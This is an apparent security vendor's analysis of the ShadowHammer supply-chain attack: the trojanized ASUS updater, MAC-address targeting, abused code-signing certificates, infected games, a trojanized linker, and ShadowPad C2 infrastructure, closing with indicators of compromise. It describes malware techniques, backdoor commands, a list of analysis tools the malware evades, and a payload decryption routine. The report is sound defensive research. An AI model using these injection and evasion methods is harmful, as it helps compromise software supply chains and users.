A look at the resource section used for carrying the malicious payload revealed that the attackers had decided not to change the file size of the ASUS Live Updater binary. They changed the resource contents and overwrote a tiny block of the code in the subject executable. The layout of that patched file is shown below.

We managed to find the original ASUS Live Updater executable which had been patched and abused by the attackers. As a result, we were able to recover the overwritten data in the resource section. The file we found was digitally signed and certainly had no infection present.

Both the legitimate ASUS executable and the resource-embedded updater binary contain timestamps from March 2015. Considering that the operation took place in 2018, this raises the following question: why did the attackers choose an old ASUS binary as the infection carrier?

Another injection technique was found in more recent samples. Using that technique, the attackers patched the code inside the C runtime (CRT) library function “___crtExitProcess”. The malicious code executes a shellcode loader instead of the standard function “___crtCorExitProcess”:

This way, the execution flow is passed to another address which is located at the end of the code section. The attackers used a small decryption routine that can fit into a block at the end of the code section, which has a series of zero bytes in the original executable. They used the same source executable file from ASUS (compiled in March 2015) for this new type of injection.

The loader code copies another block of encrypted shellcode from the file’s resource section (of the type “EXE”) to a newly allocated memory block with read-write-execute attributes and decrypts it using a custom block-chaining XOR algorithm, where the first dword is the initial seed and the total size of the shellcode is stored at an offset of +8.

We believe that the attackers changed the payload start routine in an attempt to evade detection. Apparently, they switched to a better method of hiding their embedded shellcode at some point between the end of July and September 2018.

ShadowHammer downloader

The compromised ASUS binaries carried a payload that was a Trojan downloader. Let us take a closer look at one such ShadowHammer downloader extracted from a copy of the ASUS Live Updater tool with MD5:0f49621b06f2cdaac8850c6e9581a594. It has the following properties:

  • MD5: 63f2fe96de336b6097806b22b5ab941a
  • SHA1: 6f8f43b6643fc36bae2e15025d533a1d53291b8a
  • SHA256: 1bb53937fa4cba70f61dc53f85e4e25551bc811bf9821fc47d25de1be9fd286a
  • Digital certificate fingerprint: 0f:f0:67:d8:01:f7:da:ee:ae:84:2e:9f:e5:f6:10:ea
  • File Size: 1’662’464 bytes
  • File Type: PE32 executable (GUI) Intel 80386, for MS Windows
  • Link Time: 2018.07.10 05:58:19 (GMT)

The relatively large file size is explained by the presence of partial data from the original ASUS Live Updater application appended to the end of the executable. The attackers took the original Live Updater and overwrote it with their own PE executable starting from the PE header, so that the file contains the actual PE image, whose size is only 40448 bytes, while the rest comes from ASUS. The malicious executable was created using Microsoft Visual C++ 2010.

The core function of this executable is in a subroutine which is called from WinMain, but also executed directly via a hardcoded offset from the code injected into ASUS Live Updater.

The code uses dynamic import resolution with its own simple hashing algorithm. Once the imports are resolved, it collects MAC addresses of all available network adapters and calculates an MD5 hash for each of these. After that, the hashes are compared against a table of 55 hardcoded values. Other variants of the downloader contained a different table of hashes, and in some cases, the hashes were arranged in pairs.

In other words, the malware iterates through a table of hashes and compares them to the hashes of local adapters’ MAC hashes. This way, the target system is recognized and the malware proceeds to the next stage, downloading a binary object from https://asushotfix[.]com/logo.jpg (or https://asushotfix[.]com/logo2.jpg in newer samples). The malware also sends the first hash from the match entry as a parameter in the request to identify the victim. The server response is expected to be an executable shellcode, which is placed in newly allocated memory and started.

Our investigation uncovered 230 unique samples with different shellcodes and different sets of MAC address hashes. This leads us to believe that the campaign targeted a vast number of people or companies. In total, we were able to extract 14 unique hash tables. The smallest hash table found contained eight entries and the biggest, 307 entries. Interestingly, although the subset of hash entries was changing, some of the entries were present in all of the tables.

For all users whose MAC did not match expected values, the code would create an INI file located two directory levels above the current executable and named “idx.ini”. Three values were written into the INI file under the [IDX_FILE] section:

  • [IDX_FILE]
  • XXX_IDN=YYYY-MM-DD
  • XXX_IDE=YYYY-MM-DD
  • XXX_IDX=YYYY-MM-DD

where YYYY-MM-DD is a date one week ahead of the current system date.

The code injected by the attackers was discovered with over 57000 Kaspersky Lab users. It would run but remain silent on systems that were not primary targets, making it almost impossible to discover the anomalous behavior of the trojanized executables. The exact total of the affected users around the world remains unknown.

Digital signature abuse

A lot of computer security software deployed today relies on integrity control of trusted executables. Digital signature verification is one such method. In this attack, the attackers managed to get their code signed with a certificate of a big vendor. How was that possible? We do not have definitive answers, but let us take a look at what we observed.

First of all, we noticed that all backdoored ASUS binaries were signed with two different certificates. Here are their fingerprints:

  • 0ff067d801f7daeeae842e9fe5f610ea
  • 05e6a0be5ac359c7ff11f4b467ab20fc

The same two certificates have been used in the past to sign at least 3000 legitimate ASUS files (i.e. ASUS GPU Tweak, ASUS PC Link and others), which makes it very hard to revoke these certificates.

All of the signed binaries share certain interesting features: none of them had a signing timestamp set, and the digest algorithm used was SHA1. The reason for this could be an attempt at hiding the time of the operation to make it harder to discover related forensic artefacts.

Although there is no timestamp that can be relied on to understand when the attack started, there is a mandatory field in the certificate, “Certificate Validity Period”, which can help us to understand roughly the timeframe of the operation. Apparently, because the certificate that the attackers relied on expired in 2018 and therefore had to be reissued, they used two different certificates.

Another notable fact is that both abused certificates are from the DigiCert SHA2 Assured ID Code Signing CA.

The legitimate ASUS binaries that we have observed use a different certificate, which was issued by the DigiCert EV Code Signing CA (SHA2). EV stands for “Extended Validation” and provides for stricter requirements for the party that intends to use the certificate, including hardware requirements. We believe that the attackers simply did not have access to a production signing device with an EV certificate.

This indicates that the attackers most likely obtained a copy of the certificates or abused a system on the ASUS network that had the certificates installed. We do not know about all software with malware injection they managed to sign, and we believe that the compromised signing certificates must be removed and revoked. Unfortunately, one month after this was reported to ASUS, newly released software (i.e. md5: 1b8d2459d4441b8f4a691aec18d08751) was still being signed with a compromised certificate. We have immediately notified ASUS about this and provided evidence as required.

ASUS-related attack samples

Using decrypted shellcode and through code similarity, we found a number of related samples which appear to have been part of a parallel attack wave. These files have the following properties:

  • they contain the same shellcode style as the payload from the compromised ASUS Live Updater binaries, albeit unencrypted
  • they have a forgotten PDB path of “D:\C++\AsusShellCode\Release\AsusShellCode.pdb”
  • the shellcode from all of these samples connects to the same C2: asushotfix[.]com
  • all samples were compiled between June and July 2018
  • the samples have been detected on computers all around the globe

The hashes of these related samples include:

  • 322cb39bc049aa69136925137906d855
  • 36dd195269979e01a29e37c488928497
  • 7d9d29c1c03461608bcab930fef2f568
  • 807d86da63f0db1fc746d1f0b05bc357
  • 849a2b0dc80aeca3d175c139efe5221c
  • 86A4CAC227078B9C95C560C8F0370BF0
  • 98908ce6f80ecc48628c8d2bf5b2a50c
  • a4b42c2c95d1f2ff12171a01c86cd64f
  • b4abe604916c04fe3dd8b9cb3d501d3f
  • eac3e3ece94bc84e922ec077efb15edd
  • 128CECC59C91C0D0574BC1075FE7CB40
  • 88777aacd5f16599547926a4c9202862

These files are dropped by larger setup files / installers, signed by an ASUS certificate (serial number: 0ff067d801f7daeeae842e9fe5f610ea) valid from 2015-07-27 till 2018-08-01).

The hashes of the larger installers/droppers include:

  • 0f49621b06f2cdaac8850c6e9581a594
  • 17a36ac3e31f3a18936552aff2c80249

At this point, we do not know how they were used in these attacks and whether they were delivered via a different mechanism. These files were located in a “TEMP” subfolder for ASUS Live Updater, so it is possible that the software downloaded these files directly. Locations where these files were detected include:

  • asus\asus live update\temp\1\Setup.exe
  • asus\asus live update\temp\2\Setup.exe
  • asus\asus live update\temp\3\Setup.exe
  • asus\asus live update\temp\5\Setup.exe
  • asus\asus live update\temp\6\Setup.exe
  • asus\asus live update\temp\9\Setup.exe
Public reports of the attack

While investigating this case, we were wondering how such a massive attack could go unnoticed on the Internet. Searching for any kind of evidence related to the attack, we came by a Reddit thread created in June 2018, where user GreyWolfx posted a screenshot of a suspicious-looking ASUS Live Update message:

The message claims to be a “ASUS Critical Update” notification, however, the item does not have a name or version number.

Other users commented in the thread, while some uploaded the suspicious updater to VirusTotal:

The file uploaded to VT is not one of the malicious compromised updates; we can assume the person who uploaded it actually uploaded the ASUS Live Update itself, as opposed to the update it received from the Internet. Nevertheless, this could suggest that potentially compromised updates were delivered to users as far back as June 2018.

In September 2018, another Reddit user, FabulaBerserko also posted a message about a suspicious ASUS Live update:

Asus_USA replied to FabulaBerserko with the following message, suggesting he run a scan for viruses:

In his message, the Reddit user FabulaBerserko talks about an update listed as critical, however without a name and with a release date of March 2015. Interestingly, the related attack samples containing the PDB “AsusShellCode.pdb” have a compilation timestamp from 2015 as well, so it is possible that the Reddit user saw the delivery of one such file through ASUS Live Update in September 2018.

Targets by MAC address

We managed to crack all of the 600+ MAC address hashes and analyzed distribution by manufacturer, using publicly available Ethernet-to-vendor assignment lists. It turns out that the distribution is uneven and certain vendors are a higher priority for the attackers. The chart below shows statistics we collected based on network adapter manufacturers’ names:

Some of the MAC addresses included on the target list were rather popular, i.e. 00-50-56-C0-00-08 belongs to the VMWare virtual adapter VMNet8 and is the same for all users of a certain version of the VMware software for Windows. To prevent infection by mistake, the attackers used a secondary MAC address from the real Ethernet card, which would make targeting more precise. However, it tells us that one of the targeted users used VMWare, which is rather common for software engineers (in testing their software).

Another popular MAC was 0C-5B-8F-27-9A-64, which belongs to the MAC address of a virtual Ethernet adapter created by a Huawei USB 3G modem, model E3372h. It seems that all users of this device shared the same MAC address.

Interaction with ASUS

The day after the ShadowHammer discovery, we created a short report for ASUS and approached the company through our local colleagues in Taiwan, providing all details of what was known about the attack and hoping for cooperation. The following is a timeline of the discovery of this supply-chain attack, together with ASUS interaction and reporting:

  • 29-Jan-2019 – initial discovery of the compromised ASUS Live Updater
  • 30-Jan-2019 – created preliminary report to be shared with ASUS, briefed Kaspersky Lab colleagues in Taipei
  • 31-Jan-2019 – in-person meeting with ASUS, teleconference with researchers; we notified ASUS of the finding and shared hard copy of the preliminary attack report with indicators of compromise and Yara rules. ASUS provided Kaspersky with the latest version of ASUS Live Updater, which was analyzed and found to be uninfected.
  • 01-Feb-2019 – ASUS provides an archive of all ASUS Live Updater tools beginning from 2018. None of them were infected, and they were signed with different certificates.
  • 14-Feb-2019 – second face-to-face meeting with ASUS to discuss the details of the attack
  • 20-Feb-2019 – update conf call with ASUS to provide newly found details about the attack
  • 08-Mar-2019 – provided the list of targeted MAC addresses to ASUS, answered other questions related to the attack
  • 08-Apr-2019 – provided a comprehensive report on the current attack investigation to ASUS.

We appreciate a quick response from our ASUS colleagues just days before one of the largest holidays in Asia (Lunar New Year). This helped us to confirm that the attack was in a deactivated stage and there was no immediate risk to new infections and gave us more time to collect further artefacts. However, all compromised ASUS binaries had to be properly flagged as containing malware and removed from Kaspersky Lab users’ computers.

Non-ASUS-related cases

In our search for similar malware, we came across other digitally signed binaries from three other vendors in Asia.

One of these vendors is a game development company from Thailand known as Electronics Extreme Company Limited. The company has released digitally signed binaries of a video game called “Infestation: Survivor Stories”. It is a zombie survival game in which players endure the hardships of a post-apocalyptic, zombie-infested world. According to Wikipedia, “the game was panned by critics and is considered one of the worst video games of all time“. The game servers were taken offline on December 15, 2016.”

The history of this videogame itself contains many controversies. According to Wikipedia, it was originally developed under the title of “The War Z” and released by OP Productions which put it in the Steam store in December 2012. In April 4, 2013, the game servers were compromised, and the game source code was most probably stolen and released to the public.

It seems that certain videogame companies picked up this available code and started making their own versions of the game. One such version (md5: de721e2f055f1b203ab561dda4377bab) was digitally signed by Innovative Extremist Co. LTD., a company from Thailand that currently provides web & IT infrastructure services. The game also contains a logo of Electronics Extreme Company Limited with a link to their website. The homepage of Innovative Extremist also listed Electronics Extreme as one of their partners.

Notably, the certificate from Innovative Extremist that was used to sign Infestation is currently revoked. However, the story does not end here. It seems that Electronics Extreme picked up the video game where Innovative Extremist dropped it. And now the game seems to be causing trouble again. We found at least three samples of Infestation signed by Electronics Extreme with a certificate that must be revoked again.

We believe that a poorly maintained development environment, leaked source code, as well vulnerable production servers were at the core of the bad luck chasing this videogame. Ironically, this game about infestation brought only trouble and a serious infection to its developers.

Several executable files from the popular FPS videogame PointBlank contained a similar malware injection. The game was developed by the South Korean company Zepetto Co, whose digital signature was also abused. Although the certificate was still unrevoked as at early April, Zepetto seems to have stopped using the certificate at the end of February 2019.

While some details about this case were announced in March 2019 by our colleagues at ESET, we have been working on this in parallel with ESET and uncovered some additional facts.

All these cases involve digitally signed binaries from three vendors based in three different Asian countries. They are signed with different certificates and a unique chain of trust. What is common to these cases is the way the binaries were trojanized.

The code injection happened through modification of commonly used functions such as CRT (C runtime), which is similar to ASUS case. However, the implementation is very different in the case of the videogame companies. In the ASUS case, the attackers only tampered with a compiled ASUS binary from 2015 and injected additional code. In the other cases, the binaries were recent (from the end of 2018). The malicious code was not inserted as a resource, neither did it overwrite the unused zero-filled space inside the programs. Instead, it seems to have been neatly compiled into the program, and in most cases, it starts at the beginning of the code section as if it had been added even before the legitimate code. Even the data with the encrypted payload is stored inside this code section. This indicates that the attackers either had access to the source code of the victim’s projects or injected malware on the premises of the breached companies at the time of project compilation.

Payload from non-ASUS-related cases

The payload included into the compromised videogames is rather simple. First of all, it checks whether the process has administrative privileges.

Next, it checks the registry value at HKCU\SOFTWARE\Microsoft\Windows\{0753-6681-BD59-8819}. If the value exists and is non-zero, the payload does not run further. Otherwise, it starts a new thread with a malicious intent.

The file contains a hardcoded miniconfig—an annotated example of the config is provided below.

  • C2 URL: https://nw.infestexe[.]com/version/last.php
  • Sleep time: 240000
  • Target Tag: warz
  • Unwanted processes: wireshark.exe;perfmon.exe;procmon64.exe;procmon.exe;procexp.exe;procexp64.exe;netmon.exe

Apparently, the backdoor was specifically created for this target, which is confirmed by an internal tag (the previous name of the game is “The War Z”).

If any of the unwanted processes is running, or the system language ID is Simplified Chinese or Russian, the malware does not proceed. It also checks for the presence of a mutex named Windows-{0753-6681-BD59-8819}, which is also a sign to stop execution.

After all checks are done, the malware gathers information about the system including:

  • Network adapter MAC address
  • System username
  • System hostname and IP address
  • Windows version
  • CPU architecture
  • Current host FQDN
  • Domain name
  • Current executable file name
  • Drive C: volume name and serial number
  • Screen resolution
  • System default language ID

This information is concatenated in one string using the following string template: “%s|%s|%s|%s|%s|%s|%s|%dx%d|%04x|%08X|%s|%s”.

Then the malware crafts a host identifier, which is made up of the C drive serial number string XOR-ed with the hardcoded string “*&b0i0rong2Y7un1” and encoded with the Base64 algorithm. Later on, the C: serial number may be used by the attackers to craft unique backdoor code that runs only on a system with identical properties.

The malware uses HTTP for communication with a C2 server and crafts HTTP headers on its own. It uses the following hardcoded User-Agent string: “Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36”

Interestingly, when the malware identifies the Windows version, it uses a long list:

  • Microsoft Windows NT 4.0
  • Microsoft Windows 95
  • Microsoft Windows 98
  • Microsoft Windows Me
  • Microsoft Windows 2000e
  • Microsoft Windows XP
  • Microsoft Windows XP Professional x64 Edition
  • Microsoft Windows Server 2003
  • Microsoft Windows Server 2003 R2
  • Microsoft Windows Vista
  • Microsoft Windows Server 2008
  • Microsoft Windows 7
  • Microsoft Windows Server 2008 R2
  • Microsoft Windows 8
  • Microsoft Windows Server 2012
  • Microsoft Windows 8.1
  • Microsoft Windows Server 2012 R2
  • Microsoft Windows 10
  • Microsoft Windows Server 2016

The purpose of the code is to submit system information to the C2 server with a POST request and then send another GET request to receive a command to execute.

The following commands were discovered:

  • DownUrlFile – download URL data to file
  • DownRunUrlFile – download URL data to file and execute it
  • RunUrlBinInMem – download URL data and run as shellcode
  • UnInstall – set registry flag to prevent malware start

The UnInstall command sets the registry value HKCU\SOFTWARE\Microsoft\Windows\{0753-6681-BD59-8819} to 1, which prevents the malware from contacting the C2 again. No files are deleted from the disk, and the files should be discoverable through forensic analysis.

Similarities between the ASUS attack and the non-ASUS-related cases

Although the ASUS case and the videogame industry cases contain certain differences, they are very similar. Let us briefly mention some of the similarities. For instance, the algorithm used to calculate API function hashes (in trojanized games) resembles the one used in the backdoored ASUS Updater tool.

hash = 0 for c in string: hash = hash * 0x21 hash = hash + c return hash hash = 0 for c in string: hash = hash * 0x83 hash = hash + c return hash & 0x7FFFFFFF ASUS case Other cases

Pseudocode of API hashing algorithm of ASUS vs. other cases

Besides that, our behavior engine identified that ASUS and other related samples are some of the only cases where the IPHLPAPI.dll was used from within a shellcode embedded into a PE file.

In the case of ASUS, the function GetAdaptersAddresses from the IPHLPAPI.dll was used for calculating the hashes of MAC addresses. In the other cases, the function GetAdaptersInfo from the IPHLPAPI.dll was used to retrieve information about the MAC addresses of the computer to pass to remote C&C servers.

ShadowPad connection

While investigating this case, we worked with several companies that had been abused in this wave of supply chain attacks. Our joint investigation revealed that the attackers deployed several tools on an attacked network, including a trojanized linker and a powerful backdoor packed with a recent version of VMProtect.

Our analysis of the sophisticated backdoor (md5: 37e100dd8b2ad8b301b130c2bca3f1ea) that was deployed by the attackers on the company’s internal network during the breach, revealed that it was an updated version of the ShadowPad backdoor, which we reported on in 2017.

The ShadowPad backdoor used in these cases has a very high level of complexity, which makes it almost impossible to reverse engineer:

The newly updated version of ShadowPad follows the same principle as before. The backdoor unwraps multiple stages of code before activating a system of plugins responsible for bootstrapping the main malicious functionality. As with ShadowPad, the attackers used at least two stages of C2 servers, where the first stage would provide the backdoor with an encrypted next-stage C2 domain.

The backdoor contains a hardcoded URL for C2 communication, which points to a publicly editable online Google document. Such online documents, which we extracted from several backdoors, were created by the same user under a name of Tom Giardino (hrsimon59@gmail[.]com), probably a reference to the spokesperson from Valve Corporation.

These online documents contained an ASCII block of text marked as an RSA private key during the time of operation. We noticed that inside the private key, normally encoded with base64, there was an invalid character injection (the symbol “$”):

The message between the two “$” characters in fact contained an encrypted second-stage C2 URL.

We managed to extract the history of changes and collected the following information indicating the time and C2 of ongoing operations in 2018:

  • Jul 31: UDP://103.19.3[.]17:443
  • Aug 13: UDP://103.19.3[.]17:443
  • Oct 08: UDP://103.19.3[.]17:443
  • Oct 09: UDP://103.19.3[.]17:443
  • Oct 22: UDP://117.16.142[.]9:443
  • Nov 20: HTTPS://23.236.77[.]177:443
  • Nov 21: UDP://117.16.142[.]9:443
  • Nov 22: UDP://117.16.142[.]9:443
  • Nov 23: UDP://117.16.142[.]9:443
  • Nov 27: UDP://117.16.142[.]9:443
  • Nov 27: HTTPS://103.19.3[.]44:443
  • Nov 27: TCP://103.19.3[.]44:443
  • Nov 27: UDP://103.19.3[.]44:1194
  • Nov 27: HTTPS://23.236.77[.]175:443
  • Nov 29: HTTPS://23.236.77[.]175:443
  • Nov 29: UDP://103.19.3[.]43:443
  • Nov 30: HTTPS://23.236.77[.]177:443

The IP address range 23.236.64.0-23.236.79.255 belongs to the Chinese hosting company Aoyouhost LLC, incorporated in Los Angeles, CA.

Another IP address (117.16.142[.]9) belongs to a range listed as the Korean Education Network and likely belongs to Konkuk university (konkuk.ac.kr). This IP address range has been previously reported by Avast as one of those related to the ShadowPad activity linked to the CCleaner incident. It seems that the ShadowPad attackers are still abusing the university’s network to host their C2 infrastructure.

The last one, 103.19.3[.]44, is located in Japan but seems to belong to another Chinese ISP known as “xTom Shanghai Limited”. Connected to via the IP address, the server displays an error page from Chinese web management software called BaoTa (“宝塔” in Chinese):

PlugX connection

While analyzing the malicious payload injected into the signed ASUS Live Updater binaries, we came across a simple custom encryption algorithm used in the malware. We found that ShadowHammer reused algorithms used in multiple malware samples, including many of PlugX. PlugX is a backdoor quite popular among Chinese-speaking hacker groups. It had previously been seen in the Codoso, MenuPass and Hikit attacks. Some of the samples we found (i.e. md5:5d40e86b09e6fe1dedbc87457a086d95) were created as early as 2012 if the compilation timestamp is anything to trust.

Apparently, both pieces of code share the same constants (0x11111111, 0x22222222, 0x33333333, 0x44444444), but also implement identical algorithms to decrypt data, summarized in the python function below.

from ctypes import c_uint32 from struct import pack,unpack def decrypt(data): p1 = p2 = p3 = p4 = unpack("<L", data[0:4])[0]; pos = 0 decdata = "" while pos < len(data): p1 = c_uint32(p1 + (p1 >> 3) - 0x11111111).value p2 = c_uint32(p2 + (p2 >> 5) - 0x22222222).value p3 = c_uint32(p3 - (p3 << 7) + 0x33333333).value p4 = c_uint32(p4 - (p4 << 9) + 0x44444444).value decdata += chr( ( ord(data[pos]) ^ ( ( p1%256 + p2%256 + p3%256 + p4%256 ) % 256 ) ) ) pos += 1 return decdata

 

<//pre>

While this does not indicate a strong connection to PlugX creators, the reuse of the algorithm is unusual and may suggest that the ShadowHammer developers had some experience with PlugX source code, and possibly compiled and used PlugX in some other attacks in the past.

Compromising software developers

All of the analyzed ASUS Live Updater binaries were backdoored using the same executable file patched by an external malicious application, which implemented malware injection on demand. After that, the attackers signed the executable and delivered it to the victims via ASUS update servers, which was detected by Kaspersky Lab products.

However, in the non-ASUS cases, the malware was seamlessly integrated into the code of recently compiled legitimate applications, which suggests that a different technique was used. Our deep search revealed another malware injection mechanism, which comes from a trojanized development environment used by software coders in the organization.

In late 2018, we found a suspicious sample of the link.exe tool uploaded to a public malware scanning service. The tool is part of Microsoft Visual Studio, a popular integrated development environment (IDE) used for creating applications for Microsoft Windows. The same user also uploaded digitally signed compromised executables and some of the backdoors used in the same campaign.

The attack is comprised of an infected Microsoft Incremental Linker, a malicious DLL module that gets loaded through the compromised linker. The malicious DLL then hooks the file open operation and redirects attempts to open a commonly used C++ runtime library during the process of static linking. The redirect destination is a malicious .lib file, which gets linked with the target software instead of the legitimate library. The code also carefully checks which executable is being linked and applies file redirection only if the name matches the hardcoded target file name.

So, was it a developer from a videogame company that installed the trojanized version of the development software, or did the attackers deploy the Trojan code after compromising the developer’s machine? This currently remains unknown. While we could not identify how the attackers managed to replace key files in the integrated development environment, this should serve as a wakeup call to all software developers. If your company produces software, you should ask yourself:

  1. Where does my development software come from?
  2. Is the delivery process (download) of IDE distributions secure?
  3. When did we last check the integrity of our development software?
Other victims

During the analysis of samples related to the updated ShadowPad arsenal, we discovered one unusual backdoor executable (md5: 092ae9ce61f6575344c424967bd79437). It comes as a DLL installed as a service that indirectly listens to TCP port 80 on the target system and responds to a specific URL schema, registered with Windows HTTP Service API: http://+/requested.html. The malware responds to HTTP GET/POST requests using this schema and is not easy to discover, which can help it remain invisible for a long time.

Based on the malware network behavior, we identified three further, previously unknown, victims, a videogame company, a conglomerate holding company and a pharmaceutical company, all based in South Korea, which responded with a confirmation to the malware protocol, indicating compromised servers. We are in the process of notifying the victim companies via our local regional channels. Considering that this type of malware is not widely used and is a custom one, we believe that the same threat actor or a related group are behind these further compromises. This expands the list of previously known usual targets.

Conclusions

While attacks on supply chain companies are not new, the current incident is a big landmark in the cyberattack landscape. Not only does it show that even reputable vendors may suffer from compromising of digital certificates, but it raises many concerns about the software development infrastructure of all other software companies. ShadowPad, a powerful threat actor, previously concentrated on hitting one company at a time. Current research revealed at least four companies compromised in a similar manner, with three more suspected to have been breached by the same attacker. How many more companies are compromised out there is not known. What is known is that ShadowPad succeeded in backdooring developer tools and, one way or another, injected malicious code into digitally signed binaries, subverting trust in this powerful defense mechanism.

Does it mean that we should stop trusting digital signatures? No. But we definitely need to investigate all strange or anomalous behavior, even by trusted and signed applications. Software vendors should introduce another line in their software building conveyor that additionally checks their software for potential malware injections even after the code is digitally signed.

At this unprecedented scale of operations, it is still a mystery why attackers reduced the impact by limiting payload execution to 600+ victims in the case of ASUS. We are also unsure who the ultimate victims were or where the attackers had collected the victims MAC addresses from. If you believe you are one of the victims, we recommend checking your MAC address using this free tool or online check website. And if you discover that you have been targeted by this operation, please email us at shadowhammer@kaspersky.com.

We will keep tracking the ShadowPad activities and inform you about new findings!

Indicators of compromise

C2 servers:

  • 103.19.3[.]17
  • 103.19.3[.]43
  • 103.19.3[.]44
  • 117.16.142[.]9
  • 23.236.77[.]175
  • 23.236.77[.]177

Malware samples and trojanized files:

02385ea5f8463a2845bfe362c6c659fa 915086d90596eb5903bcd5b02fd97e3e 04fb0ccf3ef309b1cd587f609ab0e81e 943db472b4fd0c43428bfc6542d11913 05eacf843b716294ea759823d8f4ab23 95b6adbcef914a4df092f4294473252f 063ff7cc1778e7073eacb5083738e6a2 98908ce6f80ecc48628c8d2bf5b2a50c 06c19cd73471f0db027ab9eb85edc607 9d86dff1a6b70bfdf44406417d3e068f 0e1cc8693478d84e0c5e9edb2dc8555c a17cb9df43b31bd3dad620559d434e53 0f49621b06f2cdaac8850c6e9581a594 a283d5dea22e061c4ab721959e8f4a24 128cecc59c91c0d0574bc1075fe7cb40 a4b42c2c95d1f2ff12171a01c86cd64f 17a36ac3e31f3a18936552aff2c80249 a76a1fbfd45ad562e815668972267c70 1a0752f14f89891655d746c07da4de01 a96226b8c5599e3391c7b111860dd654 1b95ac1443eb486924ac4d399371397c a9c750b7a3bbf975e69ef78850af0163 1d05380f3425d54e4ddfc4bacc21d90e aa15eb28292321b586c27d8401703494 1e091d725b72aed432a03a505b8d617e aac57bac5f849585ba265a6cd35fde67 2ffc4f0e240ff62a8703e87030a96e39 aafe680feae55bb6226ece175282f068 322cb39bc049aa69136925137906d855 abbb53e1b60ab7044dd379cf80042660 343ad9d459f4154d0d2de577519fb2d3 abbd7c949985748c353da68de9448538 36dd195269979e01a29e37c488928497 b042bc851cafd77e471fa0d90a082043 3c0a0e95ccedaaafb4b3f6fd514fd087 b044cd0f6aae371acf2e349ef78ab39e 496c224d10e1b39a22967a331f7de0a2 b257f366a9f5a065130d4dc99152ee10 4b8d5ae0ad5750233dc1589828da130b b4abe604916c04fe3dd8b9cb3d501d3f 4fb4c6da73a0a380c6797e9640d7fa00 b572925a7286355ac9ebb12a9fc0cc79 5220c683de5b01a70487dac2440e0ecb b96bd0bda90d3f28d3aa5a40816695ed 53886c6ebd47a251f11b44869f67163d c0116d877d048b1ba87c0de6fd7c3fb2 55a7aa5f0e52ba4d78c145811c830107 c778fc8e816061420c537db2617e0297 5855ce7c4a3167f0e006310eb1c76313 cdb0a09067877f30189811c7aea3f253 5b6cd0a85996a7d47a8e9f8011d4ad3f d07e6abebcf1f2119622c60ad0acf4fa 5eed18254d797ccea62d5b74d96b6795 d1ed421779c31df2a059fe0f91c24721 6186b317c8b6a9da3ca4c166e68883ea d4c4813b21556dd478315734e1c7ae54 63606c861a63a8c60edcd80923b18f96 dc15e578401ad9b8f72c4d60b79fdf0f 63f2fe96de336b6097806b22b5ab941a dca86d2a9eb6dc53f549860f103486a9 6ab5386b5ad294fc6ec4d5e47c9c2470 dd792f9185860e1464b4346254b2101b 6b38c772b2ffd7a7818780b29f51ccb2 e7dcfa8e75b0437975ce0b2cb123dc7b 6cf305a34a71b40c60722b2b47689220 e8db4206c2c12df7f61118173be22c89 6e94b8882fe5865df8c4d62d6cff5620 ea3b7770018a20fc7c4541c39ea271af 7d9d29c1c03461608bcab930fef2f568 eac3e3ece94bc84e922ec077efb15edd 807d86da63f0db1fc746d1f0b05bc357 ecf865c95a9bec46aa9b97060c0e317d 849a2b0dc80aeca3d175c139efe5221c ef43b55353a34be9e93160bb1768b1a6 8505484efde6a1009f90fa02ca42f011 f0ba34be0486037913e005605301f3ce 8578f0c7b0a14f129cc66ee236c58050 f2f879989d967e03b9ea0938399464ab 86a4cac227078b9c95c560c8f0370bf0 f4edc757e9917243ce513f22d0ccacf2 8756bafa7f0a9764311d52bc792009f9 f9d46bbffa1cbd106ab838ee0ccc5242 87a8930e88e9564a30288572b54faa46 fa83ffde24f149f9f6d1d8bc05c0e023 88777aacd5f16599547926a4c9202862 fa96e56e7c26515875214eec743d2db5 8baa46d0e0faa2c6a3f20aeda2556b18 fb1473e5423c8b82eb0e1a40a8baa118 8ef2d715f3a0a3d3ebc989b191682017 fcfab508663d9ce519b51f767e902806 092ae9ce61f6575344c424967bd79437 7f05d410dc0d1b0e7a3fcc6cdda7a2ff eb37c75369046fb1076450b3c34fb8ab